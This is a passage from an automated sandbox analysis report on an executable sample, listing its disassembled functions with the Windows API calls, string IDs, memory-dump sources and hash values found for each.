                                                                                                            • API String ID: 1539411459-0
                                                                                                            • Opcode ID: b88c8b616d09cf2371de65b251f6d2ddff322a21be7edb1ac03a0339e71b552c
                                                                                                            • Instruction ID: 765a8cdac8eed7e68db69660f68a3b79851d7cbbfc7545849a010460a0d23519
                                                                                                            • Opcode Fuzzy Hash: b88c8b616d09cf2371de65b251f6d2ddff322a21be7edb1ac03a0339e71b552c
                                                                                                            • Instruction Fuzzy Hash: 52F09A36001298BADB122F95AC49FCE3B19AF06310F048000FE01A91E1C7741652DBF5
                                                                                                            Function 00D698B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(00000008), ref: 00D698CC
                                                                                                            • SetTextColor.GDI32(?,?), ref: 00D698D6
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00D698E9
                                                                                                            • GetStockObject.GDI32(00000005), ref: 00D698F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                            • String ID:
                                                                                                            • API String ID: 4037423528-0
                                                                                                            • Opcode ID: 2a81bd036c6a2ea420a69bb5ff71a098fd381de70b2005b0ea318d4fc6b39452
                                                                                                            • Instruction ID: b626663c4bd2db92a0aae1734321ae093dcbf2187beb10f9f70594f1f03f9578
                                                                                                            • Opcode Fuzzy Hash: 2a81bd036c6a2ea420a69bb5ff71a098fd381de70b2005b0ea318d4fc6b39452
                                                                                                            • Instruction Fuzzy Hash: E0E06D31254780AADB216B78EC49BE83F20EB12336F08921AF6FA981E1C37146419F30
                                                                                                            Function 00DB162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00DB1634
                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB163B
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DB11D9), ref: 00DB1648
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DB11D9), ref: 00DB164F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3974789173-0
                                                                                                            • Opcode ID: 6e979af65a9f6afc4840cdd96980262abb940d75474698fa3cc3a3c71b6befaf
                                                                                                            • Instruction ID: 874eda23c9de78df51abc23be360d661984fdb4d5af42ee0b49be28263891835
                                                                                                            • Opcode Fuzzy Hash: 6e979af65a9f6afc4840cdd96980262abb940d75474698fa3cc3a3c71b6befaf
                                                                                                            • Instruction Fuzzy Hash: A6E08C36612311EBD7302FA4AE4DB8A3B7CAF447A2F188808F646CD080E7348442CB74
                                                                                                            Function 00DAD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 00DAD858
                                                                                                            • GetDC.USER32(00000000), ref: 00DAD862
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
                                                                                                            • ReleaseDC.USER32(?), ref: 00DAD8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 76a7ad52059c50e30333016b64763ffb75e7c988e5bdcce76917e3e28b7b6319
                                                                                                            • Instruction ID: 389d16244cf487f94e4d4cdb914c14ab0c28bd46d18fbed0775dba227793b623
                                                                                                            • Opcode Fuzzy Hash: 76a7ad52059c50e30333016b64763ffb75e7c988e5bdcce76917e3e28b7b6319
                                                                                                            • Instruction Fuzzy Hash: C0E01AB4810304DFCF41AFA4D84866EBBB2FB48311F10A409F856EB360C7388902EF60
                                                                                                            Function 00DAD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 00DAD86C
                                                                                                            • GetDC.USER32(00000000), ref: 00DAD876
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
                                                                                                            • ReleaseDC.USER32(?), ref: 00DAD8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 99aec78612df5bda32b45fa7dd61d98b73739fd677c8ea571430e7d8638b8f43
                                                                                                            • Instruction ID: b3b4bc9bdd048245ef60ce30d9ace78d59275659d3361552f83ebf339426e144
                                                                                                            • Opcode Fuzzy Hash: 99aec78612df5bda32b45fa7dd61d98b73739fd677c8ea571430e7d8638b8f43
                                                                                                            • Instruction Fuzzy Hash: F5E01A74C10300DFCF41AFA4D84866EBBB1FB48311B10A408F856EB360C73859029F60
                                                                                                            Function 00DC4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DC4ED4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Connection_wcslen
                                                                                                            • String ID: *$LPT
                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                            • Opcode ID: a408a0ef8a09ba35fbe01357f8dc5e2fa03971f711c2086d2b30597a134a94bc
                                                                                                            • Instruction ID: 17e6c5b61a6a6f6eff1eb69f79304c6eb0bf1c7bf1c3a379438aeb805633a7c1
                                                                                                            • Opcode Fuzzy Hash: a408a0ef8a09ba35fbe01357f8dc5e2fa03971f711c2086d2b30597a134a94bc
                                                                                                            • Instruction Fuzzy Hash: 71914A75A002059FDB14DF58C494EAABBF5AF44304F19809DE84A9B3A2D731ED85CBB0
                                                                                                            Function 00D7E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00D7E30D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorHandling__start
                                                                                                            • String ID: pow
                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                            • Opcode ID: 8dd3c76b0e002c1e352db1bd62989f832798a836db5ae7c5173989c47dfac02f
                                                                                                            • Instruction ID: 1e77e1b39492bb96bf9da39e6700ccbfb7a0ffcda414986a604ee03cd74449cb
                                                                                                            • Opcode Fuzzy Hash: 8dd3c76b0e002c1e352db1bd62989f832798a836db5ae7c5173989c47dfac02f
                                                                                                            • Instruction Fuzzy Hash: 10512661A0C202D6CB167714C94137A3BA4EF44741F38C9D8F0D9832A9FB35CC959BB6
                                                                                                            Function 00DD7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(00DA569E,00000000,?,00DECC08,?,00000000,00000000), ref: 00DD78DD
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • CharUpperBuffW.USER32(00DA569E,00000000,?,00DECC08,00000000,?,00000000,00000000), ref: 00DD783B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper$_wcslen
                                                                                                            • String ID: <s
                                                                                                            • API String ID: 3544283678-2940880691
                                                                                                            • Opcode ID: c1bece0cb40eca93e7cba605ac2f2a4bd37a03d3eb18801a5474decb80ee1087
                                                                                                            • Instruction ID: c4c66dc97b03bc7b45efeb32723ce005fdcff47deb77f6d6ff6a59af96cb3672
                                                                                                            • Opcode Fuzzy Hash: c1bece0cb40eca93e7cba605ac2f2a4bd37a03d3eb18801a5474decb80ee1087
                                                                                                            • Instruction Fuzzy Hash: 5E614F32914118AACF04EBA4CCA1DFDB374FF24701B54456AED42A7191FF349A49DBB0
                                                                                                            Function 00D6E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #
                                                                                                            • API String ID: 0-1885708031
                                                                                                            • Opcode ID: 8d51871ad636c31f017a2a19f299488046c51ea6c4b825cee51dc9142907bf85
                                                                                                            • Instruction ID: 5fccd80f7341e333c7b36e04ea09dc8647669dfc7bc475fb28080da5b5e1c1a1
                                                                                                            • Opcode Fuzzy Hash: 8d51871ad636c31f017a2a19f299488046c51ea6c4b825cee51dc9142907bf85
                                                                                                            • Instruction Fuzzy Hash: 11512279900246DFDF19DF28C4916BA7BA5EF6A310F284059EC919B2D0DB34DD46CBB0
                                                                                                            Function 00D6F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00D6F2A2
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D6F2BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                            • Opcode ID: cc77fa1863b36df1d7ce9fbfaefcb87ee92c4114f35e1a030b409fd8c902e728
                                                                                                            • Instruction ID: 4eff8aeb6ff1677d4751dcbc67f20a74975cd789eb8bb6f25bff125f361fd867
                                                                                                            • Opcode Fuzzy Hash: cc77fa1863b36df1d7ce9fbfaefcb87ee92c4114f35e1a030b409fd8c902e728
                                                                                                            • Instruction Fuzzy Hash: 2A5133714187849BD320AF14EC86BAFBBF8FF94301F81884CF9D9511A5EB318569CB66
                                                                                                            Function 00DD5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DD57E0
                                                                                                            • _wcslen.LIBCMT ref: 00DD57EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                            • String ID: CALLARGARRAY
                                                                                                            • API String ID: 157775604-1150593374
                                                                                                            • Opcode ID: 7a32d3181c5b34f70f56355d7f20760f3d7b5b0e3cc9beb46460c464442e0387
                                                                                                            • Instruction ID: 3c7e3dbccd582d0e495c727b3a3bfcb0b18ab059436ab029f2609c944591c926
                                                                                                            • Opcode Fuzzy Hash: 7a32d3181c5b34f70f56355d7f20760f3d7b5b0e3cc9beb46460c464442e0387
                                                                                                            • Instruction Fuzzy Hash: 8641A031A00209DFCB14DFA9D8818AEBBB5FF59324F24406AE506A7355E7309D81DBB0
                                                                                                            Function 00DCD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DCD130
                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DCD13A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                            • String ID: |
                                                                                                            • API String ID: 596671847-2343686810
                                                                                                            • Opcode ID: be2eb29db61c95e6c81852253bcf3624f512b7513a664b544c2c7f8e43054209
                                                                                                            • Instruction ID: bc41478a9ef44fc2098618347f37cb26c76ae71f2f6f8e54d39b7be2e31bce56
                                                                                                            • Opcode Fuzzy Hash: be2eb29db61c95e6c81852253bcf3624f512b7513a664b544c2c7f8e43054209
                                                                                                            • Instruction Fuzzy Hash: 8B31D771901219ABCF15AFA4CC85AEEBFBAFF04300F144029F819A6165E631AA56DB70
                                                                                                            Function 00DE356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00DE3621
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DE365C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DestroyMove
                                                                                                            • String ID: static
                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                            • Opcode ID: 0fc1e2fcc53e742836d13bda9e417e1bb5dd5a9ff7e7c53a79c4bec00daa775d
                                                                                                            • Instruction ID: 76c482d9b616f53aca4db37cda004337f0a414b07ddaa82a759def61fc22f75a
                                                                                                            • Opcode Fuzzy Hash: 0fc1e2fcc53e742836d13bda9e417e1bb5dd5a9ff7e7c53a79c4bec00daa775d
                                                                                                            • Instruction Fuzzy Hash: 6E31AD71110684AEDB14AF39CC84EBB73A9FF88720F00961DF8A5D7290DA30AD81D770
                                                                                                            Function 00DE4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DE461F
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DE4634
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: '
                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                            • Opcode ID: af1ae848bf87c610857a3ac3a4767930f45c54c3f3cfbb562649a560904b5688
                                                                                                            • Instruction ID: 64cf11340bb669dbaf04d1016bcc5fe42aae1fecc96205386ba61235e29ca4f6
                                                                                                            • Opcode Fuzzy Hash: af1ae848bf87c610857a3ac3a4767930f45c54c3f3cfbb562649a560904b5688
                                                                                                            • Instruction Fuzzy Hash: E9310774A013599FDB14DFAAC990BDABBB5FF49300F14406AE905AB391D770A941CFA0
                                                                                                            Function 00DE31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DE327C
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE3287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: Combobox
                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                            • Opcode ID: d8f21d07d349cb0f8785b3198f78792f16491ff1274bfd0c28475e52d7e18e37
                                                                                                            • Instruction ID: decfae717b79807dab4a3c1e1e8e756fb77d3e2a0c7a56b50628ad6c59f567ab
                                                                                                            • Opcode Fuzzy Hash: d8f21d07d349cb0f8785b3198f78792f16491ff1274bfd0c28475e52d7e18e37
                                                                                                            • Instruction Fuzzy Hash: 0D11E2713002487FEF25AE55DC88EBB37AAEB94364F140128FA58AB290D631DD518774
                                                                                                            Function 00DE3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D5600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
                                                                                                              • Part of subcall function 00D5600E: GetStockObject.GDI32(00000011), ref: 00D56060
                                                                                                              • Part of subcall function 00D5600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DE377A
                                                                                                            • GetSysColor.USER32(00000012), ref: 00DE3794
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                            • String ID: static
                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                            • Opcode ID: 142829a0429874bd0113eafb4fc13ab0aab644642edfc3a1cce86e21bcf9e628
                                                                                                            • Instruction ID: 16436a17d78328f1f562391f35bb75bce27d5d21d0b1973d434943f35e5a8397
                                                                                                            • Opcode Fuzzy Hash: 142829a0429874bd0113eafb4fc13ab0aab644642edfc3a1cce86e21bcf9e628
                                                                                                            • Instruction Fuzzy Hash: F01156B2610249AFDF10EFA8CC4AAFA7BB8EB08314F004924FD55E3250E734E9119B60
                                                                                                            Function 00DCCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
